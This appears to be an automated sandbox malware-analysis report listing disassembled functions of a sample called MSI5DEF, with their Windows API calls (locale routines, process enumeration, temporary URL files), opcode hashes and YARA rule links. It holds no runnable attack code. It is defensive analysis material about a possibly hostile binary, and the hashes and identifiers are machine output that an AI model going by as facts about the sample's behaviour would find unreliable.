                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                        • String ID: false$true
                                                                        • API String ID: 3549167292-2658103896
                                                                        • Opcode ID: bdeb71d19974e6b36859af7f3c65bb0999633c5373e9aaff896ce6eb4dd0dea7
                                                                        • Instruction ID: dbecfe29ed4f2a6926b5f0f8a723f6dda8f52086a26a375253dd6c4aae7da915
                                                                        • Opcode Fuzzy Hash: bdeb71d19974e6b36859af7f3c65bb0999633c5373e9aaff896ce6eb4dd0dea7
                                                                        • Instruction Fuzzy Hash: 05215372D04318AADF15EFE4D986EDE7BB8EF05710F008056FA199F192EB709944CBA1
                                                                        Function 00AEC9C0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 480COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00AF5C66: __EH_prolog3.LIBCMT ref: 00AF5C6D
                                                                          • Part of subcall function 00AF5C66: std::_Lockit::_Lockit.LIBCPMT ref: 00AF5C78
                                                                          • Part of subcall function 00AF5C66: std::locale::_Setgloballocale.LIBCPMT ref: 00AF5C93
                                                                          • Part of subcall function 00AF5C66: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF5CE6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AECA1A
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AECA80
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AECB4F
                                                                          • Part of subcall function 00AF45A7: __EH_prolog3.LIBCMT ref: 00AF45AE
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AECC00
                                                                        • LocalFree.KERNEL32(?,?,?,00B3B6C9,00000000,00B3B6C9), ref: 00AECD01
                                                                        • __cftoe.LIBCMT ref: 00AECE5E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2085124900-1405518554
                                                                        • Opcode ID: 5dfd162c63679ae0d400ad0b7122b1188634074306847355c75a16c625a2df17
                                                                        • Instruction ID: 9fae745c5390280a4c1f061a22778e4f4dd201b6bf66bd9c24fd1c7bc0f03bba
                                                                        • Opcode Fuzzy Hash: 5dfd162c63679ae0d400ad0b7122b1188634074306847355c75a16c625a2df17
                                                                        • Instruction Fuzzy Hash: 67129E71D00289DFDF10DFA9C985BAEBBF5EF18310F144169E815AB381E735AA05CB91
                                                                        Function 00B0B22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00B0B34B
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00B0B459
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00B0B5AB
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00B0B5C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 2751267872-393685449
                                                                        • Opcode ID: 4e9936d3f7cb6c6fe78c3cb1b57ff31ad91a180fd63b33c5bf875a8e05b9c0eb
                                                                        • Instruction ID: eb4544700b4d42a5d4251e579305622a531f44ef10f3e391179d2fe8960024c6
                                                                        • Opcode Fuzzy Hash: 4e9936d3f7cb6c6fe78c3cb1b57ff31ad91a180fd63b33c5bf875a8e05b9c0eb
                                                                        • Instruction Fuzzy Hash: C1B10671800209EFCF25DFA4C891DAEBBF5FF24310B2485DAE8156B292D731DA51CB91
                                                                        Function 00AF0260 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 269memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00AF0322
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00AF0367
                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00AF03DE
                                                                        • LocalFree.KERNEL32(?), ref: 00AF041B
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,1816BA6E,1816BA6E,?,?), ref: 00AF0546
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree$___std_exception_copy
                                                                        • String ID: ios_base::failbit set$iostream
                                                                        • API String ID: 2276494016-302468714
                                                                        • Opcode ID: 88626ccc5c09883c332a27a97e8eecbf6a46b1d60d0f543f389cd73ea6c341ce
                                                                        • Instruction ID: 79143db88109b4bfdf874d5ed2412aa539a37d0c05ec1aa702b7ed740e8c15b1
                                                                        • Opcode Fuzzy Hash: 88626ccc5c09883c332a27a97e8eecbf6a46b1d60d0f543f389cd73ea6c341ce
                                                                        • Instruction Fuzzy Hash: 14A191B1D00208DFDB18DFA9D985BAEFBB5FB48310F10825DE515AB392DB709A44CB91
                                                                        Function 00AEBA30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000044,1816BA6E,?,00000000), ref: 00AEBA8B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEBAC8
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEBB35
                                                                        • __Getctype.LIBCPMT ref: 00AEBB7E
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEBBF2
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBCAF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3635123611-1405518554
                                                                        • Opcode ID: bf4b661bca90060922b34e2e227369687ba61b4eb1d1f4c289edbaebf79042d3
                                                                        • Instruction ID: a30233d6a7ab19e0f546f2b528b550c6d49d21e0d09b57d1bd792d3f1912f326
                                                                        • Opcode Fuzzy Hash: bf4b661bca90060922b34e2e227369687ba61b4eb1d1f4c289edbaebf79042d3
                                                                        • Instruction Fuzzy Hash: E181A6B1D04388DFEB20CFA9C94579EBFF4AF15304F248199D444AB291EB759A44CB61
                                                                        Function 00AEC220 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000018,1816BA6E,?,00000000,?,?,?,?,?,?,?,00000000,00B2ABC5,000000FF), ref: 00AEC264
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEC29E
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEC302
                                                                        • __Getctype.LIBCPMT ref: 00AEC34B
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEC391
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC445
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3635123611-1405518554
                                                                        • Opcode ID: 1de1cbb3bb4fde6f81c514cff6e22e10d43302e427283846397c1ddaf7d2c02a
                                                                        • Instruction ID: 35cbda3a3fdad14ea2ca6bc2e1d01b17457a41777238bce4ba3b220eb852d824
                                                                        • Opcode Fuzzy Hash: 1de1cbb3bb4fde6f81c514cff6e22e10d43302e427283846397c1ddaf7d2c02a
                                                                        • Instruction Fuzzy Hash: F7619DB0D01288EFEB10CFE9C5097DEBFF4AF14314F248199E454AB291E7B59A09CB51
                                                                        Function 00B0743E Relevance: 12.2, APIs: 8, Instructions: 224COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(?,?), ref: 00B074C9
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B07557
                                                                        • __alloca_probe_16.LIBCMT ref: 00B07581
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B075C9
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B075E3
                                                                        • __alloca_probe_16.LIBCMT ref: 00B07609
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B07646
                                                                        • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00B07663
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                        • String ID:
                                                                        • API String ID: 3603178046-0
                                                                        • Opcode ID: 4ca36d81bf8e368d7f8b95717841ded1d2ae907086dbb1ef83be21004b1f68f9
                                                                        • Instruction ID: 1bf7e2d806b1511f91174ce45bc50ae39f95eb57ff1697689585fbc48f367f06
                                                                        • Opcode Fuzzy Hash: 4ca36d81bf8e368d7f8b95717841ded1d2ae907086dbb1ef83be21004b1f68f9
                                                                        • Instruction Fuzzy Hash: B8719271D4864AABDF218F68CC55AEEBFF9EF49354F144095E405A62D0DF32E841CB60
                                                                        Function 00B06F23 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00AEC6DF,?,00000001,00000000,?,00000000,?,00AEC6DF,?), ref: 00B06F6C
                                                                        • __alloca_probe_16.LIBCMT ref: 00B06F98
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F,?), ref: 00B06FD7
                                                                        • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F), ref: 00B06FF4
                                                                        • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F), ref: 00B07033
                                                                        • __alloca_probe_16.LIBCMT ref: 00B07050
                                                                        • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F), ref: 00B07092
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F,?), ref: 00B070B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                        • String ID:
                                                                        • API String ID: 2040435927-0
                                                                        • Opcode ID: c8ae8c288c17815275443420a20acd752e54984e528e8db4d1363c8d2be61e0c
                                                                        • Instruction ID: dda0a2fbd33894f49e031a95c99d7f98c08c53d6e97a7042276e9a2f5fa3de2b
                                                                        • Opcode Fuzzy Hash: c8ae8c288c17815275443420a20acd752e54984e528e8db4d1363c8d2be61e0c
                                                                        • Instruction Fuzzy Hash: 2F51907294420AABEB209F50DC45FABBFE9EB44790F1541A5F904E6190EF31AD51CB50
                                                                        Function 00AE5940 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 389fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTempFileNameW.KERNEL32(?,URL,00000000,?,1816BA6E,?,00000004), ref: 00AE59AA
                                                                        • LocalFree.KERNEL32(?), ref: 00AE5ABB
                                                                        • MoveFileW.KERNEL32(?,00000000), ref: 00AE5D5B
                                                                        • DeleteFileW.KERNEL32(?), ref: 00AE5DA3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: File$DeleteFreeLocalMoveNameTemp
                                                                        • String ID: URL$url
                                                                        • API String ID: 1622375482-346267919
                                                                        • Opcode ID: a7dde0a43a71245c2812b7512e3e60aec232cbb4f034541f7a64bcfd92bacc2c
                                                                        • Instruction ID: b28ebf942bc3afd49e8793970256c2d9438f77a8767d9a1ebe65bf489db31807
                                                                        • Opcode Fuzzy Hash: a7dde0a43a71245c2812b7512e3e60aec232cbb4f034541f7a64bcfd92bacc2c
                                                                        • Instruction Fuzzy Hash: 9C026870E146A98BCB24DF29CD98B9DB7B5BF54304F2042D9D409A7291EB74ABC4CF90
                                                                        Function 00AE61D0 Relevance: 10.7, APIs: 7, Instructions: 234processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AE6242
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AE6285
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AE62E1
                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00AE62FD
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AE6445
                                                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00AE6463
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AE648E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 708755948-0
                                                                        • Opcode ID: 15e042c4d4f36ef775eda678e8b7aef632f7542c657783eefdc93fa1e11446a9
                                                                        • Instruction ID: 79c8f7c1470a5ea14f6dca5e4cc2fb5d61e18e25ff88837c82bf8bfe90a925c3
                                                                        • Opcode Fuzzy Hash: 15e042c4d4f36ef775eda678e8b7aef632f7542c657783eefdc93fa1e11446a9
                                                                        • Instruction Fuzzy Hash: 2EA17A71901269DBDB20DF65C948BDEBBB4EF44304F1086D9E819A7290DBB86F84CF90
                                                                        Function 00AEF5E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 189memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,0000000C,1816BA6E,?,00000000,00000000,?,?,?,?,00000000,00B2B2D1,000000FF,?,00AEEBCA,00000000), ref: 00AEF624
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEF65A
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEF6BE
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEF77E
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEF832
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2968629171-1405518554
                                                                        • Opcode ID: 57512b2ad0b61812097d9b4efdabf7608303da4e222847b8ca373e6f33d52f02
                                                                        • Instruction ID: c4b1d26048019a8bbc575f38f657a940dc2aff4a57cbeee8b413bf01675fed80
                                                                        • Opcode Fuzzy Hash: 57512b2ad0b61812097d9b4efdabf7608303da4e222847b8ca373e6f33d52f02
                                                                        • Instruction Fuzzy Hash: 3C717DB1D01388EFEF11CFA9C94479EBFF4AF15314F1441A9E814AB291D7B59A08CBA1
                                                                        Function 00AEF3B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000008,1816BA6E,?,00000000,00000000,?,?,?,00000000,00B2B1DD,000000FF,?,00AEED0A,00000000,?), ref: 00AEF3F4
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEF42A
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEF48E
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEF4FE
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEF5B2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2968629171-1405518554
                                                                        • Opcode ID: ea0848618ee2bfc441f36278e588f8d9420fd6a7cd9d42588562ba17552de2b1
                                                                        • Instruction ID: a16562cc3141d182992d12d16813eaba2d5a6210dd07299edc4505b4b5f15d13
                                                                        • Opcode Fuzzy Hash: ea0848618ee2bfc441f36278e588f8d9420fd6a7cd9d42588562ba17552de2b1
                                                                        • Instruction Fuzzy Hash: E7618DB1D01388EEEF10CFA9D94479EBFF4EF25304F1441A9E454AB281D7799A04CB61
                                                                        Function 00B08D30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B08D67
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00B08D6F
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B08DF8
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00B08E23
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B08E78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: d901b3db2789153ed0e1fbefd0cda263b6d4489d683f45a9cfbbc7f09c8222ed
                                                                        • Instruction ID: c09731092756aa5372d1bb341646a13ab4256126e07f1c60f3800e10e7a07fb2
                                                                        • Opcode Fuzzy Hash: d901b3db2789153ed0e1fbefd0cda263b6d4489d683f45a9cfbbc7f09c8222ed
                                                                        • Instruction Fuzzy Hash: CD417034A002199BCF10DF68C884A9EBFF6EF44314F1486A9E9585B3D2DB31EA05CB91
                                                                        Function 00B1C96B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,?,00B1CA78,?,?,?,00000000,?,?,00B1CCA2,00000021,FlsSetValue,00B31E00,00B31E08,?), ref: 00B1CA2C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 3664257935-537541572
                                                                        • Opcode ID: f15fb2c156dd9d0251f297703513783f373314491c983d2a7c67f4e305a989aa
                                                                        • Instruction ID: e2469cca90603052182e6de869495f07dfaf72f23745f8005548fb25cb589f35
                                                                        • Opcode Fuzzy Hash: f15fb2c156dd9d0251f297703513783f373314491c983d2a7c67f4e305a989aa
                                                                        • Instruction Fuzzy Hash: 2C21EE31641215E7C732D7649C44BEB3BE8DF417E4FA50190E905F7195EA30ED41C6E0
                                                                        Function 00AFD8F6 Relevance: 9.4, APIs: 6, Instructions: 433COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AFD8FD
                                                                        • ctype.LIBCPMT ref: 00AFD944
                                                                          • Part of subcall function 00AFD458: __Getctype.LIBCPMT ref: 00AFD467
                                                                          • Part of subcall function 00AF79C9: __EH_prolog3.LIBCMT ref: 00AF79D0
                                                                          • Part of subcall function 00AF79C9: std::_Lockit::_Lockit.LIBCPMT ref: 00AF79DA
                                                                          • Part of subcall function 00AF79C9: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7A4B
                                                                          • Part of subcall function 00AF7AF3: __EH_prolog3.LIBCMT ref: 00AF7AFA
                                                                          • Part of subcall function 00AF7AF3: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7B04
                                                                          • Part of subcall function 00AF7AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7B75
                                                                          • Part of subcall function 00AF7CB2: __EH_prolog3.LIBCMT ref: 00AF7CB9
                                                                          • Part of subcall function 00AF7CB2: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7CC3
